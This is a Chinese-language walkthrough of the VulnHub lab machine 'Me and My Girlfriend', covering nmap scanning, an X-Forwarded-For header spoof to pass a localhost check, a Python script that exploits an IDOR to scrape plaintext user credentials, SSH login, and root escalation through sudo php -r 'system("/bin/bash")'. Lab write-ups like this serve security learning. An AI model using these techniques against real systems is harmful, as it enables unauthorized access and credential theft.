IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> vunlnhub——me and my girlfriend -> 正文阅读

[网络协议]vunlnhub——me and my girlfriend

攻击机:kali linux

目标靶机:me and my girlfriend(可在vulnhub中搜索下载)

emmm,大概意思就是Alice存了些秘密,Bob请我们帮他找出来……

目录

壹 信息收集

one 查看kali IP地址

two 主机发现

three 端口扫描

贰 渗透测试

one 浏览网站

two 设置xff头

three 越权漏洞

?four ssh连接

叁 提权?



壹 信息收集

one 查看kali IP地址

two 主机发现

用nmap获取目标主机IP地址

nmap -sn 192.168.74.0/24

目标主机IP地址为192.168.74.131

three 端口扫描

使用Nmap扫描端口详细信息


贰 渗透测试

one 浏览网站

?既然开了80端口,就看看网站是什么样子

?这。。。查看burpsuite里的包

two 设置xff头

提示需要设置xff头,重新访问一遍,用burpsuite给每一个包都加上xff头(之后的也需要这样),当然了,也可以使用插件,因为本来就需要查看包的内容,所以我就直接用burpsuite了

x-forwarded-for:127.0.0.1

登录框未发现sql注入,弱口令等漏洞,尝试注册一下,同时扫描一下目录

每次都在包里添加xff太麻烦,可以直接在burpsuite中设置

扫出的目录也没有发现什么

刚刚注册了一个用户,并尝试登录

点击profile,查看源代码,可以看到密码明文写在源码中

three 越权漏洞

尝试修改id数值,测试是否存在越权访问漏洞

猜测的不错,不如?写一个爬虫?权当复习。。。

import requests
from bs4 import BeautifulSoup

for id in range(1,13):
	headers = {
		'x-forwarded-for':'127.0.0.1',
		'Cookie':'PHPSESSID=o5jbhb8k56mfb5kth7vpmpvfe1'
	}
	url = 'http://192.168.74.131/index.php?page=profile&user_id=' + str(id)
	req = requests.get(url,headers = headers)
	soup = BeautifulSoup(req.text,"html.parser")
	name = soup.find('input',id = "username")['value']
	passwd = soup.find('input',id = "password")['value']
	print(name,passwd)

?结果:

?four ssh连接

盲猜Alice是管理员,刚刚还有22端口运行着ssh服务,尝试连接

ssh alice@192.168.74.131

成功get shell

查看隐藏文件,.my_secret很惹人注意,打开查看获取到了flag1

?flag1

my_notes.txt

喜欢新搭档?这必须得告诉Bob

叁 提权?

sudo -l

查看alice有什么权限,发现alice可以使用root权限运行php文件

使用php回调bash提权

sudo php -r 'system("/bin/bash");'

结束了,查看flag2

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-27 17:25:30  更:2022-05-27 17:25:41 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 0:32:14-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码